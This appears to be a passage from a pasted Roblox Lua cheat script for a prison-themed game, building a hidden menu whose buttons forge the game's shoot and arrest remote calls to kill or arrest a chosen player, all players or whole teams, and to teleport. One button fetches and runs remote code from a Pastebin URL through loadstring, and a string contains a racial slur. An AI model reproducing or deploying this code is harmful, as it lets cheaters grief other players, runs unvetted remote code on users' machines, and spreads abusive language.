  670. spamoff.MouseButton1Down:connect(function()
  671. spamon.Visible = true
  672. spamoff.Visible = false
  673.  
  674. local loll = FindPlayer(plrs.Text)
  675. _G.Spam = true
  676. game:GetService("RunService").Heartbeat:Connect(function()
  677. if _G.Spam == true then
  678. if loll and loll.Character then
  679. while _G.Spam == true do wait()
  680. workspace.Remote.arrest:InvokeServer(loll.Character.Torso)
  681. game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = loll.Character.HumanoidRootPart.CFrame
  682. end
  683. end
  684. end
  685. end)
  686. end)
  687.  
  688. kill.Name = "kill"
  689. kill.Parent = last
  690. kill.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  691. kill.Position = UDim2.new(0, 0, 0.389999986, 0)
  692. kill.Size = UDim2.new(0, 60, 0, 30)
  693. kill.Font = Enum.Font.SourceSans
  694. kill.Text = "kill player"
  695. kill.TextColor3 = Color3.fromRGB(255, 0, 4)
  696. kill.TextSize = 14.000
  697. kill.MouseButton1Down:connect(function()
  698. local target = FindPlayer(plrs.Text)
  699. local A_1 =
  700. {
  701. [1] =
  702. {
  703. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(277.738678, 6.89340925, 287.773712)),
  704. ["Distance"] = 4.7204174995422,
  705. ["Cframe"] = CFrame.new(832.049377, 101.392006, 2300.97168, 0.843892097, -0.0554918349, 0.533635378, 0, 0.994636595, 0.103430569, -0.536512911, -0.0872842371, 0.839366019),
  706. ["Hit"] = target.Character.Head
  707. },
  708. [2] =
  709. {
  710. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(303.047546, 21.3568707, 260.203888)),
  711. ["Distance"] = 4.8114862442017,
  712. ["Cframe"] = CFrame.new(832.390259, 101.550629, 2300.74097, 0.738044441, -0.112958886, 0.665229917, 7.45057971e-09, 0.985887885, 0.16740793, -0.674752235, -0.123554483, 0.727628946),
  713. ["Hit"] = target.Character.Head
  714. },
  715. [3] =
  716. {
  717. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(296.800507, 7.00420141, 268.067932)),
  718. ["Distance"] = 4.444625377655,
  719. ["Cframe"] = CFrame.new(832.185486, 101.391617, 2300.70264, 0.775115669, -0.0692948848, 0.628007889, 7.45057971e-09, 0.993967533, 0.109675139, -0.631819367, -0.0850109085, 0.770439863),
  720. ["Hit"] = target.Character.Head
  721. },
  722. [4] =
  723. {
  724. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(284.930573, 11.9850616, 280.483368)),
  725. ["Distance"] = 4.6211166381836,
  726. ["Cframe"] = CFrame.new(832.10083, 101.445007, 2300.86963, 0.820150614, -0.0735745132, 0.567397356, 0, 0.991697431, 0.128593579, -0.572147667, -0.105466105, 0.81334126),
  727. ["Hit"] = target.Character.Head
  728. },
  729. [5] =
  730. {
  731. ["RayObject"] = Ray.new(Vector3.new(827.412415, 101.489777, 2296.84326), Vector3.new(294.625824, 2.15741801, 270.538269)),
  732. ["Distance"] = 4.4639973640442,
  733. ["Cframe"] = CFrame.new(832.169434, 101.341301, 2300.73438, 0.784266233, -0.0537625961, 0.618090749, -3.7252903e-09, 0.99623847, 0.086654529, -0.620424569, -0.0679602176, 0.781316102),
  734. ["Hit"] = target.Character.Head
  735. }
  736. }
  737. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  738. local Event = game:GetService("ReplicatedStorage").ShootEvent
  739. Event:FireServer(A_1, A_2)
  740. end)
  741.  
  742. taze.Name = "taze"
  743. taze.Parent = last
  744. taze.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  745. taze.Position = UDim2.new(0.5, 0, 0.389999986, 0)
  746. taze.Size = UDim2.new(0, 60, 0, 30)
  747. taze.Font = Enum.Font.SourceSans
  748. taze.Text = "taze player"
  749. taze.TextColor3 = Color3.fromRGB(255, 0, 4)
  750. taze.TextSize = 14.000
  751. taze.MouseButton1Down:connect(function()
  752. local target = FindPlayer(plrs.Text)
  753. local A_1 =
  754. {
  755. [1] =
  756. {
  757. ["RayObject"] = Ray.new(Vector3.new(829.838562, 101.489998, 2331.25635), Vector3.new(-30.6540909, -5.42795324, 95.0308533)),
  758. ["Distance"] = 15.355997085571,
  759. ["Cframe"] = CFrame.new(826.616699, 100.8508, 2340.11279, 0.964640439, -0.00993416365, -0.263382077, 9.31322575e-10, 0.999289393, -0.0376908854, 0.263569355, 0.0363581516, 0.963954985),
  760. ["Hit"] = target.Character.Torso
  761. }
  762. }
  763. local A_2 = game.Players.LocalPlayer.Backpack["Taser"]
  764. local Event = game:GetService("ReplicatedStorage").ShootEvent
  765. Event:FireServer(A_1, A_2)
  766. end)
  767.  
  768. arrest.Name = "arrest"
  769. arrest.Parent = last
  770. arrest.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  771. arrest.Position = UDim2.new(0, 0, 0.540000021, 0)
  772. arrest.Size = UDim2.new(0, 60, 0, 30)
  773. arrest.Font = Enum.Font.SourceSans
  774. arrest.Text = "arrest player"
  775. arrest.TextColor3 = Color3.fromRGB(255, 0, 4)
  776. arrest.TextSize = 14.000
  777. arrest.MouseButton1Down:connect(function()
  778. local target = FindPlayer(plrs.Text)
  779. saved = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  780. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Character.HumanoidRootPart.CFrame
  781. wait(0.1)
  782. game.Workspace.Remote.arrest:InvokeServer(target.Character.HumanoidRootPart)
  783. wait(0.1)
  784. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = saved
  785. end)
  786.  
  787. tpto.Name = "tpto"
  788. tpto.Parent = last
  789. tpto.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  790. tpto.Position = UDim2.new(0.5, 0, 0.540000021, 0)
  791. tpto.Size = UDim2.new(0, 60, 0, 30)
  792. tpto.Font = Enum.Font.SourceSans
  793. tpto.Text = "goto player"
  794. tpto.TextColor3 = Color3.fromRGB(255, 0, 4)
  795. tpto.TextSize = 14.000
  796. tpto.MouseButton1Down:connect(function()
  797. local target = FindPlayer(plrs.Text)
  798. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Character.HumanoidRootPart.CFrame
  799. end)
  800.  
  801. killall.Name = "kill all"
  802. killall.Parent = last
  803. killall.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  804. killall.Position = UDim2.new(0, 0, 0.689999998, 0)
  805. killall.Size = UDim2.new(0, 60, 0, 30)
  806. killall.Font = Enum.Font.SourceSans
  807. killall.Text = "kill all"
  808. killall.TextColor3 = Color3.fromRGB(255, 0, 4)
  809. killall.TextSize = 14.000
  810. killall.MouseButton1Down:connect(function()
  811. function kill(a)
  812. local A_1 =
  813. {
  814. [1] =
  815. {
  816. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  817. ["Distance"] = 3.2524313926697,
  818. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  819. ["Hit"] = a.Character.Head
  820. },
  821. [2] =
  822. {
  823. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  824. ["Distance"] = 3.2699294090271,
  825. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  826. ["Hit"] = a.Character.Head
  827. },
  828. [3] =
  829. {
  830. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  831. ["Distance"] = 3.1665518283844,
  832. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  833. ["Hit"] = a.Character.Head
  834. },
  835. [4] =
  836. {
  837. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  838. ["Distance"] = 3.3218522071838,
  839. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  840. ["Hit"] = a.Character.Head
  841. },
  842. [5] =
  843. {
  844. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  845. ["Distance"] = 3.222757101059,
  846. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  847. ["Hit"] = a.Character.Head
  848. }
  849. }
  850. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  851. local Event = game:GetService("ReplicatedStorage").ShootEvent
  852. Event:FireServer(A_1, A_2)
  853. Event:FireServer(A_1, A_2)
  854. end
  855.  
  856. for i,v in pairs(game.Players:GetChildren())do
  857. if v.Name ~= game.Players.LocalPlayer.Name then
  858. kill(v)
  859. end
  860. end
  861. end)
  862.  
  863. arrestcrims.Name = "arrest crims"
  864. arrestcrims.Parent = last
  865. arrestcrims.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  866. arrestcrims.Position = UDim2.new(0.5, 0, 0.689999998, 0)
  867. arrestcrims.Size = UDim2.new(0, 60, 0, 30)
  868. arrestcrims.Font = Enum.Font.SourceSans
  869. arrestcrims.Text = "arrest crims"
  870. arrestcrims.TextColor3 = Color3.fromRGB(255, 0, 4)
  871. arrestcrims.TextSize = 14.000
  872. arrestcrims.MouseButton1Down:connect(function()
  873. local Player = game.Players.LocalPlayer
  874. local cpos = Player.Character.HumanoidRootPart.CFrame
  875. for i,v in pairs(game.Teams.Criminals:GetPlayers()) do
  876. if v.Name ~= Player.Name then
  877. local i = 10
  878. repeat
  879. wait()
  880. i = i-1
  881. game.Workspace.Remote.arrest:InvokeServer(v.Character.HumanoidRootPart)
  882. Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,1)
  883. until i == 0
  884. end
  885. end
  886. Player.Character.HumanoidRootPart.CFrame = cpos
  887. end)
  888.  
  889. cmdx.Name = "cmdx"
  890. cmdx.Parent = last
  891. cmdx.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  892. cmdx.Position = UDim2.new(0, 0, 0.839999974, 0)
  893. cmdx.Size = UDim2.new(0, 60, 0, 32)
  894. cmdx.Font = Enum.Font.SourceSans
  895. cmdx.Text = "load cmd-x"
  896. cmdx.TextColor3 = Color3.fromRGB(255, 0, 4)
  897. cmdx.TextSize = 14.000
  898. cmdx.MouseButton1Down:connect(function()
  899. loadstring(game:HttpGet("https://pastebin.com/raw/HFkyyd1H",true))()
  900. wait(10)
  901. game.Players.LocalPlayer.OsPlatform = "nigga why the fuck u looking here"
  902. game.Players.LocalPlayer.VRDevice = "Olucus Quest"
  903. end)
  904.  
  905. local ScreenGui = Instance.new("ScreenGui")
  906. local mass = Instance.new("Frame")
  907. local crims = Instance.new("TextButton")
  908. local cops = Instance.new("TextButton")
  909. local neutral = Instance.new("TextButton")
  910. local inmates = Instance.new("TextButton")
  911.  
  912. ScreenGui.Parent = game.CoreGui
  913.  
  914. mass.Name = "mass"
  915. mass.Parent = ScreenGui
  916. mass.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  917. mass.Position = UDim2.new(0.695322275, 0, 0.418205798, 0)
  918. mass.Size = UDim2.new(0, 117, 0, 77)
  919. mass.Active = true
  920. mass.Visible = true
  921. mass.Draggable = true
  922.  
  923. crims.Name = "crims"
  924. crims.Parent = mass
  925. crims.BackgroundColor3 = Color3.fromRGB(255, 0, 4)
  926. crims.Position = UDim2.new(0, 0, 0.587767065, 0)
  927. crims.Size = UDim2.new(0, 59, 0, 32)
  928. crims.Font = Enum.Font.SourceSans
  929. crims.Text = "kill gunlovers"
  930. crims.TextColor3 = Color3.fromRGB(0, 0, 0)
  931. crims.TextSize = 14.000
  932. crims.MouseButton1Down:connect(function()
  933. function kill(a)
  934. local A_1 =
  935. {
  936. [1] =
  937. {
  938. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  939. ["Distance"] = 3.2524313926697,
  940. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  941. ["Hit"] = a.Character.Head
  942. },
  943. [2] =
  944. {
  945. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  946. ["Distance"] = 3.2699294090271,
  947. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  948. ["Hit"] = a.Character.Head
  949. },
  950. [3] =
  951. {
  952. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  953. ["Distance"] = 3.1665518283844,
  954. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  955. ["Hit"] = a.Character.Head
  956. },
  957. [4] =
  958. {
  959. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  960. ["Distance"] = 3.3218522071838,
  961. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  962. ["Hit"] = a.Character.Head
  963. },
  964. [5] =
  965. {
  966. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  967. ["Distance"] = 3.222757101059,
  968. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  969. ["Hit"] = a.Character.Head
  970. }
  971. }
  972. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  973. local Event = game:GetService("ReplicatedStorage").ShootEvent
  974. Event:FireServer(A_1, A_2)
  975. Event:FireServer(A_1, A_2)
  976. end
  977.  
  978. for i,v in pairs(game.Teams.Criminals:GetPlayers()) do
  979. kill(v)
  980. end
  981. end)
  982.  
  983. cops.Name = "cops"
  984. cops.Parent = mass
  985. cops.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
  986. cops.Position = UDim2.new(0, 0, 0.162547126, 0)
  987. cops.Size = UDim2.new(0, 59, 0, 32)
  988. cops.Font = Enum.Font.SourceSans
  989. cops.Text = "kill abusers"
  990. cops.TextColor3 = Color3.fromRGB(0, 0, 0)
  991. cops.TextSize = 14.000
  992. cops.MouseButton1Down:connect(function()
  993. function kill(a)
  994. local A_1 =
  995. {
  996. [1] =
  997. {
  998. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  999. ["Distance"] = 3.2524313926697,
  1000. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  1001. ["Hit"] = a.Character.Head
  1002. },
  1003. [2] =
  1004. {
  1005. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  1006. ["Distance"] = 3.2699294090271,
  1007. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  1008. ["Hit"] = a.Character.Head
  1009. },
  1010. [3] =
  1011. {
  1012. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  1013. ["Distance"] = 3.1665518283844,
  1014. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  1015. ["Hit"] = a.Character.Head
  1016. },
  1017. [4] =
  1018. {
  1019. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  1020. ["Distance"] = 3.3218522071838,
  1021. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  1022. ["Hit"] = a.Character.Head
  1023. },
  1024. [5] =
  1025. {
  1026. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  1027. ["Distance"] = 3.222757101059,
  1028. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  1029. ["Hit"] = a.Character.Head
  1030. }
  1031. }
  1032. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  1033. local Event = game:GetService("ReplicatedStorage").ShootEvent
  1034. Event:FireServer(A_1, A_2)
  1035. Event:FireServer(A_1, A_2)
  1036. end
  1037.  
  1038. for i,v in pairs(game.Teams.Guards:GetPlayers()) do
  1039. kill(v)
  1040. end
  1041. end)
  1042.  
  1043. neutral.Name = "neutral"
  1044. neutral.Parent = mass
  1045. neutral.BackgroundColor3 = Color3.fromRGB(107, 107, 107)
  1046. neutral.Position = UDim2.new(0.483779579, 0, 0.587767065, 0)
  1047. neutral.Size = UDim2.new(0, 59, 0, 32)
  1048. neutral.Font = Enum.Font.SourceSans
  1049. neutral.Text = "kill skids"
  1050. neutral.TextColor3 = Color3.fromRGB(0, 0, 0)
  1051. neutral.TextSize = 14.000
  1052. neutral.MouseButton1Down:connect(function()
  1053. function kill(a)
  1054. local A_1 =
  1055. {
  1056. [1] =
  1057. {
  1058. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  1059. ["Distance"] = 3.2524313926697,
  1060. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  1061. ["Hit"] = a.Character.Head
  1062. },
  1063. [2] =
  1064. {
  1065. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  1066. ["Distance"] = 3.2699294090271,
  1067. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  1068. ["Hit"] = a.Character.Head
  1069. },
  1070. [3] =
  1071. {
  1072. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  1073. ["Distance"] = 3.1665518283844,
  1074. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  1075. ["Hit"] = a.Character.Head
  1076. },
  1077. [4] =
  1078. {
  1079. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  1080. ["Distance"] = 3.3218522071838,
  1081. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  1082. ["Hit"] = a.Character.Head
  1083. },
  1084. [5] =
  1085. {
  1086. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  1087. ["Distance"] = 3.222757101059,
  1088. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  1089. ["Hit"] = a.Character.Head
  1090. }
  1091. }
  1092. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  1093. local Event = game:GetService("ReplicatedStorage").ShootEvent
  1094. Event:FireServer(A_1, A_2)
  1095. Event:FireServer(A_1, A_2)
  1096. end
  1097.  
  1098. for i,v in pairs(game.Teams.Neutral:GetPlayers()) do
  1099. kill(v)
  1100. end
  1101. end)
  1102.  
  1103. inmates.Name = "inmates"
  1104. inmates.Parent = mass
  1105. inmates.BackgroundColor3 = Color3.fromRGB(255, 170, 0)
  1106. inmates.Position = UDim2.new(0.483779579, 0, 0.162547141, 0)
  1107. inmates.Size = UDim2.new(0, 59, 0, 32)
  1108. inmates.Font = Enum.Font.SourceSans
  1109. inmates.Text = "kill punchers"
  1110. inmates.TextColor3 = Color3.fromRGB(0, 0, 0)
  1111. inmates.TextSize = 14.000
  1112. inmates.MouseButton1Down:connect(function()
  1113. function kill(a)
  1114. local A_1 =
  1115. {
  1116. [1] =
  1117. {
  1118. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-391.152252, 8.65560055, -83.2166901)),
  1119. ["Distance"] = 3.2524313926697,
  1120. ["Cframe"] = CFrame.new(840.310791, 101.334137, 2267.87988, 0.0636406094, 0.151434347, -0.986416459, 0, 0.988420188, 0.151741937, 0.997972965, -0.00965694897, 0.0629036576),
  1121. ["Hit"] = a.Character.Head
  1122. },
  1123. [2] =
  1124. {
  1125. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-392.481476, -8.44939327, -76.7261353)),
  1126. ["Distance"] = 3.2699294090271,
  1127. ["Cframe"] = CFrame.new(840.290466, 101.184189, 2267.93506, 0.0964837447, 0.0589403138, -0.993587971, 4.65661287e-10, 0.998245299, 0.0592165813, 0.995334625, -0.00571343815, 0.0963144377),
  1128. ["Hit"] = a.Character.Head
  1129. },
  1130. [3] =
  1131. {
  1132. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-389.21701, -2.50536323, -92.2163162)),
  1133. ["Distance"] = 3.1665518283844,
  1134. ["Cframe"] = CFrame.new(840.338867, 101.236496, 2267.80371, 0.0166504811, 0.0941716284, -0.995416701, 1.16415322e-10, 0.995554805, 0.0941846818, 0.999861419, -0.00156822044, 0.0165764652),
  1135. ["Hit"] = a.Character.Head
  1136. },
  1137. [4] =
  1138. {
  1139. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-393.353973, 3.13988972, -72.5452042)),
  1140. ["Distance"] = 3.3218522071838,
  1141. ["Cframe"] = CFrame.new(840.277222, 101.285957, 2267.9707, 0.117109694, 0.118740402, -0.985994935, -1.86264515e-09, 0.992826641, 0.119563118, 0.993119001, -0.0140019981, 0.116269611),
  1142. ["Hit"] = a.Character.Head
  1143. },
  1144. [5] =
  1145. {
  1146. ["RayObject"] = Ray.new(Vector3.new(845.555908, 101.429337, 2269.43945), Vector3.new(-390.73172, 3.2097764, -85.5477524)),
  1147. ["Distance"] = 3.222757101059,
  1148. ["Cframe"] = CFrame.new(840.317993, 101.286423, 2267.86035, 0.0517584644, 0.123365127, -0.991010666, 0, 0.992340803, 0.123530701, 0.99865967, -0.00639375951, 0.0513620302),
  1149. ["Hit"] = a.Character.Head
  1150. }
  1151. }
  1152. local A_2 = game.Players.LocalPlayer.Backpack["Remington 870"]
  1153. local Event = game:GetService("ReplicatedStorage").ShootEvent
  1154. Event:FireServer(A_1, A_2)
  1155. Event:FireServer(A_1, A_2)
  1156. end
  1157.  
  1158. for i,v in pairs(game.Teams.Inmates:GetPlayers()) do
  1159. kill(v)
  1160. end
  1161. end)
  1162.  
  1163. function onKeyPress(actionName, userInputState, inputObject)
  1164. if userInputState == Enum.UserInputState.Begin then
  1165. if toggle == false then
  1166. toggle = true
  1167. ui.Visible = true
  1168. Frame.Visible = true
  1169. gui.Visible = true
  1170. last.Visible = true
  1171. mass.Visible = true
  1172. else
  1173. toggle = false
  1174. ui.Visible = false
  1175. Frame.Visible = false
  1176. gui.Visible = false
  1177. last.Visible = false
  1178. mass.Visible = false
  1179. end
  1180. end
  1181. end
  1182.  
  1183. game.ContextActionService:BindAction("keyPress", onKeyPress, false, Enum.KeyCode.X)
  1184.  
  1185. game.Players.LocalPlayer.CameraMaxZoomDistance = 2000
  1186.  
  1187. while wait() do
  1188. game.Lighting.Ambient = Color3.new(1,1,1)
  1189. game.Lighting.FogEnd = 100000
  1190. game.Lighting.FogStart = 100000
  1191. game.Lighting.Brightness = 2
  1192. game.Lighting.ColorShift_Bottom = Color3.new(1,1,1)
  1193. game.Lighting.ColorShift_Top = Color3.new(1,1,1)
  1194. game.Lighting.OutdoorAmbient = Color3.new(1,1,1)
  1195. end
  1196.  
  1197. game.Players.LocalPlayer.OsPlatform = "nigga why the fuck u looking here"
Add Comment
Please, Sign In to add comment